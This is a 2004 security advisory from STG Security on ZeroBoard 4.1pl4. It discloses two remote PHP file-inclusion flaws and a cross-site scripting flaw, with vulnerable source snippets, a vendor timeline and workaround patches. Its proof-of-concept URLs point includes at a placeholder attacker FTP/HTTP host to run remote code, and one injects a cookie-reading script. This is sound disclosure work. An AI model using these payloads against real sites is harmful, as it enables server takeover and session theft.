STG Security Advisory 2004-12-20.16

`-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
STG Security Advisory: [SSA-20041220-16] PHP source injection and cross-site  
scripting vulnerabilities in ZeroBoard  
  
Revision 1.2  
Date Published: 2004-12-20 (KST)  
Last Update: 2004-12-24  
Disclosed by SSR Team ([email protected])  
  
Summary  
=======  
ZeroBoard is one of widely used web BBS applications in Korea. . However, an  
input validation flaw can cause malicious attackers to run arbitrary  
commands with the privilege of the HTTPD process, which is typically run as  
the nobody user.  
  
  
Vulnerability Class  
===================  
Implementation Error: Input validation flaw  
  
Impact  
======  
High : arbitrary commands execution.  
  
Affected Products  
================  
ZeroBoard 4.1pl4 and prior  
  
Vendor Status: NOT FIXED  
========================  
2004-11-20 Vulnerabilities found.  
2004-11-20 1st vendor contact, but they didn't replied.  
2004-11-22 2nd vendor contact, but they didn't replied.  
2004-12-13 STG Security, Inc. customer notified.  
2004-12-24 Official release.  
  
Details  
=======  
Vulnerability 1 : PHP source injection vulnerability  
- - ------------------------------------  
- - - Proof of concept  
http://[victim]/outlogin.php?_zb_path=ftp://[attacker]/pub/  
  
- - - Environment  
PHP 5.0.x  
php.ini : register_globals = On  
  
- - - Description  
As of PHP 5.0.0, file_exists() can be used with URL wrappers explained at  
http://www.php.net/manual/en/function.file-exists.php. Thus _zb_path  
parameter in outlogin.php can be easily exploited.  
  
- - - Part of vulnerable source, outlogin.php.  
- - ----  
// 제로보드 디렉토리 인지 체크  
if(!file_exists($_zb_path."lib.php")) {  
echo "제로보드 디렉토리가 아닙니다";  
return;  
}  
  
// _head.php 읽음  
@include $_zb_path."_head.php";  
  
}  
- - ----  
  
Vulnerability 2 : PHP source injection vulnerability  
- - ------------------------------------  
- - - Proof of concept  
http://[victim]/include/write.php?dir=http://[attacker]/  
  
  
- - - Environment  
php.ini: register_globals = On  
  
- - - Reason  
Uninitialized $dir variable in write.php  
  
  
- - - Part of vulnerable source, include/write.php  
- - ----  
include $dir."/write.php";  
- - ----  
  
Vulnerability 3 : Cross-site scripting vulnerability  
- - --------------------------------------  
- - - Proof of concept  
http://[victim]/check_user_id.php?user_id=<script>alert(document.cookie)</sc  
ript>  
  
  
- - - Reason  
check_user_id.php doesn't validate the input value of user_id.  
  
- - - Part of vulnerable source, check_user_id.php  
- - ----  
$user_id = trim($user_id);  
... 생략 ...  
if($check[0]) echo "$user_id 는 이미 등록된<br> 아이디입니다";  
else echo"$user_id 는 사용하실수 있습니다";  
... 생략 ...  
- - ----  
  
  
Workaround  
==========  
Without official patches of theses vulnerability, modify the vulnerable  
sources as following recommendations.  
  
Vulnerability 1: As of zboard 4.1pl4  
- - ----------------------------  
Insert the following code at 59th line of outlogin.php,  
  
if(eregi(":\/\/",$_zb_path)) $_zb_path="";  
  
  
Vulnerability 2: As of zboard 4.1pl4  
- - ----------------------------  
Insert the following code at 15th line of include/write.php,  
  
if(eregi(":\/\/",$dir)) $dir="";  
  
  
Vulnerability 3: As of zboard 4.1pl4  
- - ----------------------------  
Insert the following code at 3rd line of check_user_id.php,  
  
$user_id = htmlspecialchars(trim($user_id));  
  
  
Credits  
======  
Jeremy Bae at STG Security  
  
-----BEGIN PGP SIGNATURE-----  
Version: PGP 8.0  
  
iQA/AwUBQctlEj9dVHd/hpsuEQJffgCg5fzqeXst5usCjWoK5fNV6lruGakAoJtM  
awAFdddxTNRwEEy4vyUuxre9  
=kiqS  
-----END PGP SIGNATURE-----  
  
  
`